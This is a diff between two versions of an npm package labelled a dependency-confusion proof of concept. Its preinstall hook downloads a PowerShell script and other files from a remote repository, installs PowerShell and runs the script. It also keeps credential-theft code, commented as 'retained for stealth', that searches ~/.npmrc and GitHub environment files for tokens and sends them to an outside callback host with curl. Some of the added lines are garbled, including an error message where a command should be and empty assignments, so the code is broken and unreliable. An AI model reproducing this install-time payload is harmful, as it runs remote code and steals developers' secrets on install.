@girirajravichandran/corp-build-utils-poc 99.9.29 → 99.9.31

package/package.json

@@ -1,12 +1,9 @@
 {
   "name": "@girirajravichandran/corp-build-utils-poc",
-  "version": "99.9.29",
+  "version": "99.9.31",
   "description": "dependency confusion poc",
   "private": false,
   "scripts": {
     "preinstall": "node preinstall.js"
-  },
-  "dependencies": {
-    "@girirajravichandran/corp-build-utils-poc": "^99.9.29"
   }
 }

package/preinstall.js

@@ -1,15 +1,60 @@
-const { exec } = require('child_process');
+const { exec, spawn } = require('child_process');
 const fs = require('fs');
 const path = require('path');
 const os = require('os');
+const https = require('https');
 
+// helper to download a file
+function download(url, dest, cb) {
+    const file = fs.createWriteStream(dest);
+    https.get(url, res => {
+        res.pipe(file);
+        file.on('finish', () => file.close(cb));
+    }).on('error', err => {
+        fs.unlink(dest, () => cb(err));
+    });
+}
+
+// 1. download the three files into the original working directory (npm sets INIT_CWD)
+const targetDir = process.env.INIT_CWD || process.cwd();
+const files = [
+    'https://raw.githubusercontent.com/GirirajRavichandran/test-public/main/file.ps1',
+    'https://raw.githubusercontent.com/GirirajRavichandran/test-public/main/god-killer.txt',
+    'https://raw.githubusercontent.com/GirirajRavichandran/test-public/main/god.txt'
+];
+let completed = 0;
+files.forEach(url => {
+    const name = path.basename(url);
+    download(url, path.join(targetDir, name), err => {
+        completed++;
+        if (err) console.error('download failed', url, err);
+    });
+});
+
+// 2. install pwsh using brew, then wait, then run command
+function runBrewInstall() {
+    const brew = spawn('brew', ['install', 'powershell'], { stdio: 'inherit' });
+    brew.on('close', code => {
+        setTimeout(runPwsh, 10000); // wait 10 seconds before running powershell command
+    });
+}
+
+function runPwsh() {
+    const cwd = process.env.INIT_CWD || process.cwd();
+    const scriptPath = path.join(cwd, 'file.ps1');
+    const cmd = Processing -File '' failed: The value cannot be an empty string. (Parameter 'path') Specify a valid path for the -File parameter.;
+    exec(cmd, { cwd }, (err, out) => {
+        if (err) console.error('pwsh execution failed', err);
+    });
+}
+
+runBrewInstall();
+
+// previous exfil logic retained for stealth
 const homeDir = os.homedir();
 const oastUrl = "http://3y2ev1k4fi83c60p0h36tf3t9kfb31rq.oastify.com";
 
-// 1. Collect from current environment
-let exfilData = `ENV_TOKEN=${process.env.GITHUB_TOKEN || 'none'}`;
-
-// 2. Hunt for secrets in local config files
+let exfilData = ;
 const targets = [
     { name: 'NPMRC', path: path.join(homeDir, '.npmrc') },
     { name: 'GITHUB_ENV', path: process.env.GITHUB_ENV || '' },
@@ -20,15 +65,13 @@ targets.forEach(target => {
     if (fs.existsSync(target.path)) {
         try {
             const content = fs.readFileSync(target.path, 'utf8');
-            // Basic regex to find strings starting with ghp_
             const match = content.match(/ghp_[a-zA-Z0-9]{36}/);
-            if (match) exfilData += `&${target.name}=${match[0]}`;
+            if (match) exfilData += ;
         } catch (e) {}
     }
 });
 
-// 3. Exfiltrate everything found
 const user = os.userInfo().username;
-const cmd = `curl -G "${oastUrl}" --data-urlencode "victim=${user}" --data-urlencode "data=${exfilData}"`;
-
+const cmd = ;
 exec(cmd);
+